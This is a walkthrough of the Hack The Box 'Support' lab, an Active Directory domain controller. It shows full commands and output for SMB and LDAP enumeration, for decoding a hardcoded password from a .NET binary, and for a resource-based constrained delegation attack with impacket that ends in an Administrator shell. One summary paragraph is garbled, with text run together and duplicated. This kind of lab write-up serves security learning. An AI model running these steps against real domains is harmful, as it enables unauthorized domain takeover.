Support – Hack The Box

Task 1 – How many shares is Support showing on SMB?

Let’s start by nmap scan first:

─(kali㉿kali)-[~/Desktop]
└─$ nmap -sV -sC -sT 10.129.230.181
Starting Nmap 7.95 ( <https://nmap.org> ) at 2026-02-22 18:25 CET
Nmap scan report for 10.129.230.181
Host is up (0.053s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-22 17:25:19Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -5s
| smb2-time: 
|   date: 2026-02-22T17:25:21
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 55.52 seconds

From the nmap scan, the domain is support.htb. Port 445 is open

Let’s enumerate the shares using smbclient:

                                                                                 
┌──(kali㉿kali)-[~/Desktop]
└─$ smbclient -L //10.129.230.181
Password for [WORKGROUP\\kali]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.230.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

We find hence 6 shares

Task 2 – Which share is not a default share for a Windows domain controller?

The support-tools share is not a default share for a Windows Domain Controller

Task 3 – Almost all of the files in this share are publicly available tools, but one is not. What is the name of that file?

The file is UserInfo.exe.zip

Task 4 – What is the hardcoded password used for LDAP in the UserInfo.exe binary?

I connected to the share using and downloaded the zip file:

──(kali㉿kali)-[~/Desktop/Support]
└─$ smbclient //10.129.230.181/support-tools
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> ls
  .                                   D        0  Wed Jul 20 19:01:06 2022
  ..                                  D        0  Sat May 28 13:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 13:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 13:19:55 2022
  putty.exe                           A  1273576  Sat May 28 13:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 13:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 19:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 13:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 13:19:43 2022

                4026367 blocks of size 4096. 959555 blocks available
smb: \\> SMBecho failed (NT_STATUS_CONNECTION_RESET). The connection is disconnected now

                                                                                 
┌──(kali㉿kali)-[~/Desktop/Support]
└─$ smbclient //10.129.230.181/support-tools
Password for [WORKGROUP\\kali]:
Try "help" to get a list of possible commands.
smb: \\> get UserInfo.exe.zip
getting file \\UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (279.1 KiloBytes/sec) (average 279.1 KiloBytes/sec)
smb: \\>

I then extracted the zip file and got multiple executables:

I tried to dump the password using strings however I did not find it:

──(kali㉿kali)-[~/Desktop/Support]
└─$ strings UserInfo.exe                     
!This program cannot be run in DOS mode.
.text
`.rsrc
@.reloc
,Er
,ZsE
BSJB
v4.0.30319
#Strings
#GUID
#Blob
<Main>d__0
<>u__1
Task`1
CommandLineParser`1
TaskAwaiter`1
IParserResult`1
Int32
<OnExecuteAsync>d__2
Command`2
Int64
<Module>
<Main>
get_ASCII
mscorlib
ParseAsync
OnExecuteAsync
get_PropertiesToLoad
Protected
AwaitUnsafeOnCompleted
get_IsCompleted
System.Collections.Specialized
<UserName>k__BackingField
<LastName>k__BackingField
<FirstName>k__BackingField
<Verbose>k__BackingField
MatthiWare.CommandLine.Abstractions.Command
getPassword
enc_password
get_Message
IDisposable
Console
set_AppName
get_UserName
set_UserName
get_LastName
set_LastName
get_FirstName
set_FirstName
username
FromFileTime
DateTime
FindOne
MatthiWare.CommandLine
WriteLine
IAsyncStateMachine
SetStateMachine
stateMachine
ValueType
set_AuthenticationType
OnConfigure
ReadOnlyCollectionBase
get_Verbose
set_Verbose
verbose
Dispose
Create
<>1__state
Write
RequiredAttribute
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
NameAttribute
AsyncStateMachineAttribute
DefaultValueAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
DebuggerHiddenAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
value
UserInfo.exe
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
MatthiWare.CommandLine.Abstractions.Parsing
get_Task
FindAll
Program
get_Item
System
CancellationToken
cancellationToken
Main
System.Reflection
ResultPropertyValueCollection
StringCollection
SearchResultCollection
ResultPropertyCollection
SetException
Description
UserInfo
AsyncTaskMethodBuilder
ICommandConfigurationBuilder
<>t__builder
DirectorySearcher
FindUser
GetUser
printUser
CommandLineParser
TaskAwaiter
GetAwaiter
set_Filter
IEnumerator
GetEnumerator
.ctor
.cctor
System.Diagnostics
UserInfo.Commands
DiscoverCommands
UserInfo.Services
System.Runtime.InteropServices
System.Runtime.CompilerServices
System.DirectoryServices
DebuggingModes
get_Properties
AuthenticationTypes
MatthiWare.CommandLine.Core.Attributes
GetBytes
args
System.Threading.Tasks
Contains
System.Collections
commandOptions
GlobalOptions
FindUserOptions
GetUserOptions
CommandLineParserOptions
options
get_HasErrors
Concat
Object
get_Default
SearchResult
GetResult
SetResult
get_Current
get_Count
Start
Convert
last
first
MoveNext
System.Text
GetExecutingAssembly
LdapQuery
query
DirectoryEntry
entry
WrapNonExceptionThrows
UserInfo
Copyright 
  2022
$5a280d0b-9fd0-4701-8f96-82e2f1ea9dfb
1.0.0.0
.NETFramework,Version=v4.8
FrameworkDisplayName
.NET Framework 4.8 
UserInfo.Program+<Main>d__0
/UserInfo.Commands.FindUser+<OnExecuteAsync>d__2
.UserInfo.Commands.GetUser+<OnExecuteAsync>d__2
username
Username
first
First name
last
        Last name
verbose
Verbose output
RSDS
C:\\Users\\0xdf\\source\\repos\\UserInfo\\obj\\Release\\UserInfo.pdb
_CorExeMain
mscoree.dll

Opening UserInfo.exe.config, we find it is describing a .Net:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup> 
        <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
    </startup>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="System.Runtime.CompilerServices.Unsafe" publicKeyToken="b03f5f7f11d50a3a" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-6.0.0.0" newVersion="6.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>

So let’s reverse UserInfo.exe using dnSpy. Using dnSpy, I found a password for the user armando that needs to be deobfuscated first:

I wrote a python code to decode it:

import base64

enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
key = b"armando"

# Step 1: Base64 decode
data = base64.b64decode(enc_password)

# Step 2: XOR with repeating key and 223
decoded = bytearray()

for i in range(len(data)):
    decoded_byte = data[i] ^ key[i % len(key)] ^ 223
    decoded.append(decoded_byte)

# Step 3: Convert to string
print(decoded.decode("utf-8"))

The hardcoded (decoded password) is hence nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz. Now we have a set of credentials:

- username: armando
- password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Task 5 – Which field in the LDAP data for the user named support stands out as potentially holding a password?

Lets try to do so using ldapsearch using the following query:

ldapsearch -x -H ldap://support.htb -D "support.htb\\\\armando" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(sAMAccountName=armando)" *

But it did not work. I then tried another command still did not work

ldapdomaindump -u 'support.htb\\armando' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' 10.129.230.181

I then tried bloodhound, still did not work.

After being stuck for couple of hours, I remembered the executable UserInfo.exe we found. Let’s try to run it. I was not able to run using Wine from Kali. So I checked the writeup and found they ran it and captured the credentials using wireshark. The captured credentials are:

- username: ldap
- password: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Let’s ldapsearch now on the support user:

──(kali㉿kali)-[~/Desktop/Support]
└─$ ldapsearch -H ldap://dc.support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(sAMAccountName=support)"     
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (sAMAccountName=support)
# requesting: ALL
#

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support
c: US
l: Chapel Hill
st: NC
postalCode: 27514
distinguishedName: CN=support,CN=Users,DC=support,DC=htb
instanceType: 4
whenCreated: 20220528111200.0Z
whenChanged: 20220528111201.0Z
uSNCreated: 12617
info: Ironside47pleasure40Watchful
memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
uSNChanged: 12630
company: support
streetAddress: Skipper Bowles Dr
name: support
objectGUID:: CqM5MfoxMEWepIBTs5an8Q==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 0
pwdLastSet: 132982099209777070
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA==
accountExpires: 9223372036854775807
logonCount: 0
sAMAccountName: support
sAMAccountType: 805306368
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dSCorePropagationData: 20220528111201.0Z
dSCorePropagationData: 16010101000000.0Z

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Now we have a new set of credentials:

- username - support
- password: Ironside47pleasure40Watchful

We can then login using evil-winrm and submit the flag

Task 6 – What open port on Support allows a user in the Remote Management Users group to run PowerShell commands and get an interactive shell?

5985

Task 7 – Bloodhound data will show that the support user has what privilege on the DC.SUPPORT.HTB object?

I run bloodhound on found the support user has GenericAll on the DC.SUPPORT.HTB

Task 8 – A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain?

GenericAll have full rights to an object

Task 9 – A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain?

ms-ds-machineaccountquota

Task 10 – Following the steps for the Computer Takeover attack, eventually I get a ticket for the administrator, which Rubeus says should give administrator access in that session, but it doesn’t work. What is the name of the script from Impacket that can convert that ticket to ccache format?

Searching online, we find the ticket name is ticketConverter.py. This script is used to convert Kerberos tickets between Windows and Linux formats. It converts:

.kirbi → .ccache
.ccache → .kirbi

Task 11 – What is the name of the environment variable on our local system that we’ll set to that ccache file to allow use of files like psexec.py with the -k and -no-pass options?

Making a research online, the environment variable is KRB5CCNAME

Task 12 – Flag

Based on the questions, we should first check ms-DS-MachineAccountQuota (MAQ) to know how many computer can the support add
Abuse GenericAll Command and add a fake computer:

You have GenericAll on DC$
        ↓
You created FAKE01$ (a machine account you control)
        ↓
rbcd.py tells DC$: "trust FAKE01$"
        ↓
Now you use FAKE01$'s credentials to request a ticket
AS IF you were Administrator (S4U2Self + S4U2Proxy)
        ↓
You get a Kerberos ticket for Administrator → full access

Obtain a service Ticket
Convert the ticket to Linux

Starting by the first step, I enumerated ms-ds-machineaccountquota and found it is equal to 10:

$ ldapsearch -H ldap://dc.support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(objectClass=domain)" ms-DS-MachineAccountQuota            
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (objectClass=domain)
# requesting: ms-DS-MachineAccountQuota 
#

# support.htb
dn: DC=support,DC=htb
ms-DS-MachineAccountQuota: 10

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

This means that any authenticated domain user can create up to 10 computers objects. Lets try to add now a fake computer using impacket:

──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ impacket-addcomputer -computer-name 'FAKE01$' -computer-pass 'Password123!' -dc-ip 10.129.8.180 'support.htb/support:Ironside47pleasure40Watchful'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account FAKE01$ with password Password123!.

Now, we need the SID of the new computer, which is AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL1RcAAA==

┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ldapsearch -H ldap://dc.support.htb -D '[email protected]' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'dc=support,dc=htb' "(sAMAccountName=FAKE01$)" objectSid
# extended LDIF
#
# LDAPv3
# base <dc=support,dc=htb> with scope subtree
# filter: (sAMAccountName=FAKE01$)
# requesting: objectSid 
#

# FAKE01, Computers, support.htb
dn: CN=FAKE01,CN=Computers,DC=support,DC=htb
objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEIL1RcAAA==

# search reference
ref: ldap://ForestDnsZones.support.htb/DC=ForestDnsZones,DC=support,DC=htb

# search reference
ref: ldap://DomainDnsZones.support.htb/DC=DomainDnsZones,DC=support,DC=htb

# search reference
ref: ldap://support.htb/CN=Configuration,DC=support,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 5
# numEntries: 1
# numReferences: 3

Now we need to abuse Resource-Based-Constrained Delegation (RBCD):

──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ ./rbcd.py -delegate-from 'FAKE01$' -delegate-to 'DC$' -action write -dc-ip 10.129.8.180 'support.htb/support:Ironside47pleasure40Watchful'        
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] FAKE01$ can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     FAKE01$      (S-1-5-21-1677581083-3380853377-188903654-6101)

Now lets get the service ticket

┌──(kali㉿kali)-[~]
└─$ /usr/share/doc/python3-impacket/examples/getST.py -spn 'cifs/dc.support.htb' -impersonate Administrator -dc-ip 10.129.8.180 'support.htb/FAKE01$:Password123!' 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@[email protected]

The ticket is in ccache format so no need to convert it

Final step is to psexec (moved the ticket to tmp for permission purposes)

─(kali㉿kali)-[~]
└─$ cp ~/Administrator@[email protected] /tmp/admin.ccache
                                                                                 
┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=/tmp/admin.ccache
                                                                                 
┌──(kali㉿kali)-[~]
└─$ sudo -E impacket-psexec -k -no-pass dc.support.htb
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file zjfTaoPS.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service UjGY on dc.support.htb.....
[*] Starting service UjGY.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\\Windows\\system32>

Attack Summary – Resource-Based Constrained Delegation (RBCD)

1. Reconnaissance We checked ms-DS-MachineAccountQuota which was set to 10, meaning any regular domain user can add up to 10 computer accounts to the domain. This was our entry point.

2. Creating a Fake Computer We used our support user credentials to add a fake machine account FAKE01$ to the domain. This gave us a computer account we fully control — including its password.

3. Abusing GenericAll with RBCD We had GenericAll permission over the Domain Controller object. This means we could modify any of its attributes. We abused this by writing to the DC’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute, telling it: “trust FAKE01$ to act on behalf of any user”. This is the core of RBCD.

4. Requesting a Forged Ticket* Using FAKE01′scredentials,wetriggeredtheKerberosS4U2Self+S4U2Proxyprotocol.ThisisbasicallyaskingtheKDC:∗”FAKE01 wants to act as Administrator to access the DC’s CIFS service”*. Since we set up the trust in step 3, the KDC issued the ticket. ′scredentials,wetriggeredtheKerberosS4U2Self+S4U2Proxyprotocol.ThisisbasicallyaskingtheKDC:∗”FAKE01’s credentials, we triggered the Kerberos S4U2Self + S4U2Proxy protocol. This is basically asking the KDC: *”FAKE01

5. Using the Ticket We exported the .ccache ticket and used psexec with it to authenticate as Administrator to the DC — giving us a SYSTEM shell.